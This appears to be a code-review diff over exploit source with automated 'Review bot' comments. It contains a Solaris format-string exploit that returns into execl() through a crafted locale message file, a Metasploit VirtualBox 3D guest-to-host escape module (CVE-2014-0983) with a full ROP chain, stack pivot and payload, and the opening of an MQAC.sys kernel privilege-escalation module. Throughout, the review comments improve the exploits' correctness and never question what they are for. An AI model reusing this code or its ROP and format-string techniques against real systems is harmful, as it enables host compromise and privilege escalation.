* So we can adjust the padding\'s size to let the fakeframe address
* I find "startaddr" always can be divided by 4.
* So we can adjust the padding's size to let the fakeframe address
* can be aligned with 4.
*
* len = length of \"argv\" + \"env\" + \"platform\" + \"program name\"
* len = length of "argv" + "env" + "platform" + "program name"
* if (len%4)!=0, sp_addr - startaddr = (len/4)*4 + 4
* if (len%4)==0, sp_addr - startaddr = len
* So we can get every entry\'s address precisely based on startaddr or sp_addr.
* Now we won\'t be bored with guessing the alignment and offset.:)
* So we can get every entry's address precisely based on startaddr or sp_addr.
* Now we won't be bored with guessing the alignment and offset.:)
*/
len = arg_len + env_len + strlen(plat) + 1
+ strlen(VULPROG) + 1;
printf(\"len = %#x\\n\", len);
printf("len = %#x\n", len);

/* get stack bottom address */

@ -161,7 +161,7 @@ main( int argc, char **argv )
sh_addr = sp_addr - (4 - len%4) /* the trailing zero number */
- strlen(VULPROG) - strlen(plat) - strlen(SHELL) - 3 ;

printf(\"SHELL address = %#x\\n\", sh_addr);
printf("SHELL address = %#x\n", sh_addr);

/* get our fake frame address */
fp_addr = sh_addr - 8*8 - 1;
@ -169,27 +169,27 @@ main( int argc, char **argv )
/* get execl() address */
if (!(handle=dlopen(NULL,RTLD_LAZY)))
{
fprintf(stderr,\"Can\'t dlopen myself.\\n\");
fprintf(stderr,"Can't dlopen myself.\n");
exit(1);
}
if ((execl_addr=(long)dlsym(handle,\"execl\"))==NULL)
if ((execl_addr=(long)dlsym(handle,"execl"))==NULL)
{
fprintf(stderr,\"Can\'t find execl().\\n\");
fprintf(stderr,"Can't find execl().\n");
exit(1);
}

/* dec 4 to skip the \'save\' instructure */
/* dec 4 to skip the 'save' instructure */
execl_addr -= 4;

/* check if the exec addr includes zero */
if (!(execl_addr & 0xff) || !(execl_addr * 0xff00) ||
!(execl_addr & 0xff0000) || !(execl_addr & 0xff000000))
{
fprintf(stderr,\"the address of execl() contains a \'0\'. sorry.\\n\");
fprintf(stderr,"the address of execl() contains a '0'. sorry.\n");
exit(1);
}

printf(\"Using execl() address : %#x\\n\",execl_addr);
printf("Using execl() address : %#x\n",execl_addr);

/* now we set up our fake stack frame */

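
Review bot: `(execl_addr=(long)dlsym(handle,"execl"))==NULL` compares an integer to a pointer constant; test the `dlsym` result as a pointer before casting, and the `dlopen` handle is never released with `dlclose`. The zero-byte check a few lines down repeats the `!(execl_addr * 0xff00)` typo (multiplication instead of `&`) seen in the other copy of this file, so byte 1 of the address is never tested.
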
@ -211,15 +211,15 @@ main( int argc, char **argv )
*addrptr++=fp1_addr;
*addrptr++=fp1_addr;
*addrptr++=fp1_addr; /* we need this address to work */
*addrptr++=fp1_addr; /* cause we don\'t need exec another func,so put garbage here */
*addrptr++=fp1_addr; /* cause we don't need exec another func,so put garbage here */
*addrptr++=0x0;

/* get correct retloc in solaris 2.6(0xefffxxxx) and solaris 7/8 (0xffbexxxx) */
retloc = (get_sp()&0xffff0000) + (retloc & 0x0000ffff);

printf(\"Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\\n\", retloc, fp_addr, align );
printf("Using RETloc address = 0x%x, fp_addr = 0x%x ,align= %d\n", retloc, fp_addr, align );

/* Let\'s make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/
/* Let's make reloc buffer: |AAAA|retloc-4|AAAA|retloc-2|AAAA|retloc|AAAA|retloc+2|*/

addrptr = (long *)retlocbuf;

@ -231,19 +231,19 @@ main( int argc, char **argv )
*(addrptr + 7) = retloc + 2;

if((pattern = (char *)malloc(BUFSIZE)) == NULL) {
printf(\"Can\'t get enough memory!\\n\");
printf("Can't get enough memory!\n");
exit(-1);
}

/* Let\'s make formats string buffer:
/* Let's make formats string buffer:
* |A..AAAAAAAAAAAA|%.8x....|%(fp1)c%hn%(fp2)%hn%(execl1)c%hn%(execl2)%hn|
*/
ptr = pattern;
memset(ptr, \'A\', 32);
memset(ptr, 'A', 32);
ptr += 32;

for(i = 0 ; i < num ; i++ ){
memcpy(ptr, \"%.8x\", 4);
memcpy(ptr, "%.8x", 4);
ptr += 4;
}

@ -254,32 +254,32 @@ main( int argc, char **argv )


/* Big endian arch */
sprintf(ptr, \"%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn\",
sprintf(ptr, "%%%uc%%hn%%%uc%%hn%%%uc%%hn%%%uc%%hn",
(reth - num*8 -4*8 + align ), (0x10000 + retl - reth),
(0x20000 + reth1 - retl), (0x30000 + retl1 - reth1));

if( !(fp = fopen(\"messages.po\", \"w+\")))
if( !(fp = fopen("messages.po", "w+")))
{
perror(\"fopen\");
perror("fopen");
exit(1);
}
fprintf(fp,\"domain \\\"messages\\\"\\n\");
fprintf(fp,\"msgid \\\"%%s: illegal option -- %%c\\\\n\\\"\\n\");
fprintf(fp,\"msgstr \\\"%s\\\\n\\\"\", pattern + align);
fprintf(fp,"domain \"messages\"\n");
fprintf(fp,"msgid \"%%s: illegal option -- %%c\\n\"\n");
fprintf(fp,"msgstr \"%s\\n\"", pattern + align);
fclose(fp);
system(\"/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po\");
system("/usr/bin/msgfmt -o SUNW_OST_OSLIB messages.po");

/* thanks for z33d\'s idea.
/* thanks for z33d's idea.
* It seems we have to do like this in Solaris 8.
*/
i=open(\"./SUNW_OST_OSLIB\",O_RDWR);
i=open("./SUNW_OST_OSLIB",O_RDWR);
/* locate the start position of formats strings in binary file*/
lseek(i, 62, SEEK_SET);
/* replace the start bytes with our retlocbuf */
write(i, retlocbuf + align, 32 - align);
close(i);

execle(VULPROG, VULPROG, \"-z\", NULL, env);
execle(VULPROG, VULPROG, "-z", NULL, env);
}


@ -3,13 +3,13 @@
# Current source: https://github.com/rapid7/metasploit-framework
##

require \'msf/core\'
require \'rex\'
require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking

DEVICE = \'\\\\\\\\.\\\\VBoxGuest\'
DEVICE = '\\\\.\\VBoxGuest'
INVALID_HANDLE_VALUE = 0xFFFFFFFF

# VBOX HGCM protocol constants
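
Review bot: the `DEVICE` literal is easy to misread; in a Ruby single-quoted string only `\\` and `\'` are escapes, so `'\\\\.\\VBoxGuest'` evaluates to `\\.\VBoxGuest`, which is the intended Win32 device path form. A trailing comment giving the evaluated value would save the next reader the same check.
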
@ -36,59 +36,59 @@ class Metasploit3 < Msf::Exploit::Local

def initialize(info={})
super(update_info(info, {
\'Name\' => \'VirtualBox 3D Acceleration Virtual Machine Escape\',
\'Description\' => %q{
'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape',
'Description' => %q{
This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
sequence of specially crafted of rendering messages, a virtual machine can exploit an out
of bounds array access to corrupt memory and escape to the host. This module has been
tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
},
\'License\' => MSF_LICENSE,
\'Author\' =>
'License' => MSF_LICENSE,
'Author' =>
[
\'Francisco Falcon\', # Vulnerability Discovery and PoC
\'Florian Ledoux\', # Win 8 64 bits exploitation analysis
\'juan vazquez\' # MSF module
'Francisco Falcon', # Vulnerability Discovery and PoC
'Florian Ledoux', # Win 8 64 bits exploitation analysis
'juan vazquez' # MSF module
],
\'Arch\' => ARCH_X86_64,
\'Platform\' => \'win\',
\'SessionTypes\' => [\'meterpreter\'],
\'DefaultOptions\' =>
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => ['meterpreter'],
'DefaultOptions' =>
{
\'EXITFUNC\' => \'thread\'
'EXITFUNC' => 'thread'
},
\'Targets\' =>
'Targets' =>
[
[ \'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)\',
[ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
{
:messages => :target_virtualbox_436_win7_64
}
]
],
\'Payload\' =>
'Payload' =>
{
\'Space\' => 7000,
\'DisableNops\' => true
'Space' => 7000,
'DisableNops' => true
},
\'References\' =>
'References' =>
[
[\'CVE\', \'2014-0983\'],
[\'BID\', \'66133\'],
[\'URL\', \'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities\'],
[\'URL\', \'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration\'],
[\'URL\', \'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php\']
['CVE', '2014-0983'],
['BID', '66133'],
['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration'],
['URL', 'http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php']
],
\'DisclosureDate\' => \'Mar 11 2014\',
\'DefaultTarget\' => 0
'DisclosureDate' => 'Mar 11 2014',
'DefaultTarget' => 0
}))

end

def open_device
r = session.railgun.kernel32.CreateFileA(DEVICE, \"GENERIC_READ | GENERIC_WRITE\", 0, nil, \"OPEN_EXISTING\", \"FILE_ATTRIBUTE_NORMAL\", 0)
r = session.railgun.kernel32.CreateFileA(DEVICE, "GENERIC_READ | GENERIC_WRITE", 0, nil, "OPEN_EXISTING", "FILE_ATTRIBUTE_NORMAL", 0)

handle = r[\'return\']
handle = r['return']

if handle == INVALID_HANDLE_VALUE
return nil
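
Review bot: the Description text has a stray word, "a sequence of specially crafted of rendering messages"; drop the second "of". In `open_device`, the `INVALID_HANDLE_VALUE` branch returns `nil` without surfacing `r['GetLastError']`, so a missing guest-additions driver and an access-denied open look identical to the caller; log the error code before returning.
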
@ -98,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Local
end

def send_ioctl(ioctl, msg)
result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\")
result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")

if result[\"GetLastError\"] != 0
unless result[\"ErrorMessage\"].blank?
vprint_error(\"#{result[\"ErrorMessage\"]}\")
if result["GetLastError"] != 0
unless result["ErrorMessage"].blank?
vprint_error("#{result["ErrorMessage"]}")
end
return nil
end

unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length
unless result[\"ErrorMessage\"].blank?
vprint_error(\"#{result[\"ErrorMessage\"]}\")
unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
unless result["ErrorMessage"].blank?
vprint_error("#{result["ErrorMessage"]}")
end
return nil
end

unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0
unless result[\"ErrorMessage\"].blank?
vprint_error(\"#{result[\"ErrorMessage\"]}\")
unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
unless result["ErrorMessage"].blank?
vprint_error("#{result["ErrorMessage"]}")
end
return nil
end
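
Review bot: the three failure branches in `send_ioctl` are identical copies of the same `unless result["ErrorMessage"].blank? ... return nil` block, and the second and third fire on conditions (`lpBytesReturned` short, non-zero HGCM return code in `lpOutBuffer`) for which `ErrorMessage` is usually empty, so they return `nil` silently; factor the block into one helper that takes a message naming which check failed, and include the unpacked HGCM status value in the third case.
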
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Local
end

def connect
msg = \"\\x00\" * CONNECT_MSG_SIZE
msg = "\x00" * CONNECT_MSG_SIZE

msg[4, 4] = [2].pack(\"V\")
msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\"
msg[4, 4] = [2].pack("V")
msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"

result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)

@ -136,15 +136,15 @@ class Metasploit3 < Msf::Exploit::Local
return result
end

client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first
client_id = result["lpOutBuffer"][136, 4].unpack("V").first

client_id
end

def disconnect
msg = \"\\x00\" * DISCONNECT_MSG_SIZE
msg = "\x00" * DISCONNECT_MSG_SIZE

msg[4, 4] = [@client_id].pack(\"V\")
msg[4, 4] = [@client_id].pack("V")

result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)

@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local
end

def set_pid(pid)
msg = \"\\x00\" * SET_PID_MSG_SIZE
msg = "\x00" * SET_PID_MSG_SIZE

msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")
msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\")
msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\")
msg[20, 4] = [pid].pack(\"V\")
msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
msg[4, 4] = [@client_id].pack("V") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V")
msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
msg[20, 4] = [pid].pack("V")

result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)

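
Review bot: the parameter at offset 16 is typed `VMM_DEV_HGCM_PARM_TYPE_64_BIT`, yet only four bytes of `pid` are written at offset 20 with `pack("V")`; the high dword is zero purely because the buffer was pre-filled with `"\x00" * SET_PID_MSG_SIZE`. Packing with `"Q<"` (or a comment stating that the upper half is intentionally zero) makes the 64-bit layout explicit and keeps it correct if the pre-fill ever changes.
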
@ -167,16 +167,16 @@ class Metasploit3 < Msf::Exploit::Local
end

def set_version
msg = \"\\x00\" * SET_VERSION_MSG_SIZE
msg = "\x00" * SET_VERSION_MSG_SIZE

msg[0, 4] = [VERR_WRONG_ORDER].pack(\"V\")
msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\")
msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\")
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\")
msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
msg[4, 4] = [@client_id].pack("V") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")

result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)

@ -184,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local
end

def trigger(buff_addr, buff_length)
msg = \"\\x00\" * CALL_EA_MSG_SIZE
msg = "\x00" * CALL_EA_MSG_SIZE

msg[4, 4] = [@client_id].pack(\"V\") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\")
msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\")
msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf)
msg[36, 4] = [buff_addr].pack(\"V\") # (buf)
msg[4, 4] = [@client_id].pack("V") # u32ClientID
msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
msg[20, 4] = [@client_id].pack("V") # u32ClientID
msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
msg[32, 4] = [buff_length].pack("V") # size_of(buf)
msg[36, 4] = [buff_addr].pack("V") # (buf)

result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)

@ -201,9 +201,9 @@ class Metasploit3 < Msf::Exploit::Local
end

def stack_adjustment
pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\" # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB
pivot << \"\\x89\\xc4\" # mov esp, eax # Store stack bottom in esp
pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # Plus a little offset...
pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp
pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset...

pivot
end
@ -222,30 +222,30 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# See at the end of the module for a better description of the ROP Chain,
|
||||
# or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
|
||||
# All gadgets from VBoxREM.dll
|
||||
opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\")
|
||||
opcodes_data = [0x8, 0x30, 0x331].pack("V*")
|
||||
|
||||
opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
|
||||
opcodes_data << [112].pack(\"Q<\") # RDX
|
||||
opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret
|
||||
opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret
|
||||
opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
|
||||
opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret
|
||||
opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
|
||||
opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
|
||||
opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
|
||||
opcodes_data << [112].pack("Q<") # RDX
|
||||
opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
|
||||
opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
|
||||
opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
|
||||
opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
|
||||
opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
|
||||
opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
|
||||
opcodes_data << Rex::Text.pattern_create(80)
|
||||
opcodes_data << [0].pack(\"Q<\") # 1st arg (lpAddress) # chain will store stack address here
|
||||
opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here
|
||||
opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
|
||||
opcodes_data << [0x2000].pack(\"Q<\") # 2nd arg (dwSize)
|
||||
opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize)
|
||||
opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
|
||||
opcodes_data << [0x40].pack(\"V\") # 3rd arg (flNewProtect)
|
||||
opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect)
|
||||
opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
|
||||
opcodes_data << [0x6A70BB20].pack(\"V\") # ptr to jmp VirtualProtect instr.
|
||||
opcodes_data << \"A\" * 8
|
||||
opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9
|
||||
opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10
|
||||
opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\" # jmp $+608
|
||||
opcodes_data << \"A\" * (624 - 24 - 5)
|
||||
opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot
|
||||
opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr.
|
||||
opcodes_data << "A" * 8
|
||||
opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
|
||||
opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
|
||||
opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608
|
||||
opcodes_data << "A" * (624 - 24 - 5)
|
||||
opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
|
||||
opcodes_data << stack_adjustment
|
||||
opcodes_data << payload.encoded
|
||||
opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
|
||||
|
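Review bot: the gadget comments in this hunk are inconsistent: the numbering jumps from Gadget 6 to Gadget 8, and Gadget 9 and Gadget 10 carry no disassembly even though Gadget 9 reuses the Gadget 3 address 0x6a70a560 (`lea rax,[rsp+8] # ret`). Annotate `opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9` and the `0x6a6c9d3d` line the same way as Gadgets 2 through 8 so the chain can be audited without opening a disassembler. The unescaping itself is sound: `\"Q<\"` becomes `"Q<"`, and `\"\\xe9\\x5b\\x02\\x00\\x00\"` becomes `"\xe9\x5b\x02\x00\x00"`, which still yields the five-byte `jmp` the comment describes.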
@ -256,11 +256,11 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# not reused until the second packet arrives. The second packet,
|
||||
# of course, must have 8196 bytes length too. So this memory is
|
||||
# reused and code execution can be accomplished.
|
||||
opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\")
|
||||
opcodes_data << \"B\" * (8196 - opcodes_data.length)
|
||||
opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
|
||||
opcodes_data << "B" * (8196 - opcodes_data.length)
|
||||
end
|
||||
|
||||
msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data
|
||||
msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
|
||||
|
||||
msg
|
||||
end
|
||||
|
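Review bot: the message length 8196 is a magic number repeated in both branches (`Rex::Text.pattern_create(8196 - opcodes_data.length)` in the first, `"B" * (8196 - opcodes_data.length)` here), and the comment stresses that the second packet must match it exactly; hoist it into a named constant so the two cannot drift apart. The old/new pairs in this hunk differ only in the removed backslash escapes around `"V*"` and `"C*"`.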
@ -287,53 +287,53 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
def exploit
|
||||
unless self.respond_to?(target[:messages])
|
||||
print_error(\"Invalid target specified: no messages callback function defined\")
|
||||
print_error("Invalid target specified: no messages callback function defined")
|
||||
return
|
||||
end
|
||||
|
||||
print_status(\"Opening device...\")
|
||||
print_status("Opening device...")
|
||||
@handle = open_device
|
||||
if @handle.nil?
|
||||
fail_with(Failure::NoTarget, \"#{DEVICE} device not found\")
|
||||
fail_with(Failure::NoTarget, "#{DEVICE} device not found")
|
||||
else
|
||||
print_good(\"#{DEVICE} found, exploiting...\")
|
||||
print_good("#{DEVICE} found, exploiting...")
|
||||
end
|
||||
|
||||
print_status(\"Connecting to the service...\")
|
||||
print_status("Connecting to the service...")
|
||||
@client_id = connect
|
||||
if @client_id.nil?
|
||||
fail_with(Failure::Unknown, \"Connect operation failed\")
|
||||
fail_with(Failure::Unknown, "Connect operation failed")
|
||||
end
|
||||
|
||||
print_good(\"Client ID #{@client_id}\")
|
||||
print_good("Client ID #{@client_id}")
|
||||
|
||||
print_status(\"Calling SET_VERSION...\")
|
||||
print_status("Calling SET_VERSION...")
|
||||
result = set_version
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to SET_VERSION\")
|
||||
fail_with(Failure::Unknown, "Failed to SET_VERSION")
|
||||
end
|
||||
|
||||
this_pid = session.sys.process.getpid
|
||||
print_status(\"Calling SET_PID...\")
|
||||
print_status("Calling SET_PID...")
|
||||
result = set_pid(this_pid)
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to SET_PID\")
|
||||
fail_with(Failure::Unknown, "Failed to SET_PID")
|
||||
end
|
||||
|
||||
this_proc = session.sys.process.open
|
||||
print_status(\"Sending First 0xEA Opcode Message to control head_spu...\")
|
||||
print_status("Sending First 0xEA Opcode Message to control head_spu...")
|
||||
result = send_opcodes_msg(this_proc, 1)
|
||||
if result.nil?
|
||||
fail_with(Failure::Unknown, \"Failed to control heap_spu...\")
|
||||
fail_with(Failure::Unknown, "Failed to control heap_spu...")
|
||||
end
|
||||
|
||||
print_status(\"Sending Second 0xEA Opcode Message to execute payload...\")
|
||||
print_status("Sending Second 0xEA Opcode Message to execute payload...")
|
||||
@old_timeout = session.response_timeout
|
||||
session.response_timeout = 5
|
||||
begin
|
||||
send_opcodes_msg(this_proc, 2)
|
||||
rescue Rex::TimeoutError
|
||||
vprint_status(\"Expected timeout in case of successful exploitation\")
|
||||
vprint_status("Expected timeout in case of successful exploitation")
|
||||
end
|
||||
end
|
||||
|
||||
|
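Review bot: the status and failure messages for the first 0xEA message name the same thing differently: `"Sending First 0xEA Opcode Message to control head_spu..."` versus `"Failed to control heap_spu..."`; one of them is a typo, so align them. Separately, `session.response_timeout = 5` is lowered here and the old value saved in `@old_timeout`, but nothing in this hunk restores it; if the restore lives in the cleanup method, a one-line comment pointing at it would help the next reader. The quote unescaping in this hunk (print_status, fail_with, the `#{DEVICE}` interpolations) is mechanical and correct.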
@ -348,12 +348,12 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
unless @client_id.nil?
|
||||
print_status(\"Disconnecting from the service...\")
|
||||
print_status("Disconnecting from the service...")
|
||||
disconnect
|
||||
end
|
||||
|
||||
unless @handle.nil?
|
||||
print_status(\"Closing the device...\")
|
||||
print_status("Closing the device...")
|
||||
session.railgun.kernel32.CloseHandle(@handle)
|
||||
end
|
||||
end
|
||||
|
|
|
@ -3,8 +3,8 @@
|
|||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require \'msf/core\'
|
||||
require \'rex\'
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Local
|
||||
Rank = AverageRanking
|
||||
|
@ -14,64 +14,64 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
|
||||
def initialize(info={})
|
||||
super(update_info(info, {
|
||||
\'Name\' => \'MQAC.sys Arbitrary Write Privilege Escalation\',
|
||||
\'Description\' => %q{
|
||||
'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation',
|
||||
'Description' => %q{
|
||||
A vulnerability within the MQAC.sys module allows an attacker to
|
||||
overwrite an arbitrary location in kernel memory.
|
||||
|
||||
This module will elevate itself to SYSTEM, then inject the payload
|
||||
into another SYSTEM process.
|
||||
},
|
||||
\'License\' => MSF_LICENSE,
|
||||
\'Author\' =>
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
\'Matt Bergin\', # original exploit and all the hard work
|
||||
\'Spencer McIntyre\' # MSF module
|
||||
'Matt Bergin', # original exploit and all the hard work
|
||||
'Spencer McIntyre' # MSF module
|
||||
],
|
||||
\'Arch\' => [ ARCH_X86 ],
|
||||
\'Platform\' => [ \'win\' ],
|
||||
\'SessionTypes\' => [ \'meterpreter\' ],
|
||||
\'DefaultOptions\' =>
|
||||
'Arch' => [ ARCH_X86 ],
|
||||
'Platform' => [ 'win' ],
|
||||
'SessionTypes' => [ 'meterpreter' ],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
\'EXITFUNC\' => \'thread\',
|
||||
'EXITFUNC' => 'thread',
|
||||
},
|
||||
\'Targets\' =>
|
||||
'Targets' =>
|
||||
[
|
||||
[ \'Windows XP SP3\',
|
||||
[ 'Windows XP SP3',
|
||||
{
|
||||
\'_KPROCESS\' => \"\\x44\",
|
||||
\'_TOKEN\' => \"\\xc8\",
|
||||
\'_UPID\' => \"\\x84\",
|
||||
\'_APLINKS\' => \"\\x88\"
|
||||
'_KPROCESS' => "\x44",
|
||||
'_TOKEN' => "\xc8",
|
||||
'_UPID' => "\x84",
|
||||
'_APLINKS' => "\x88"
|
||||
}
|
||||
],
|
||||
],
|
||||
\'References\' =>
|
||||
'References' =>
|
||||
[
|
||||
[ \'CVE\', \'2014-4971\' ],
|
||||
[ \'EDB\', \'34112\' ],
|
||||
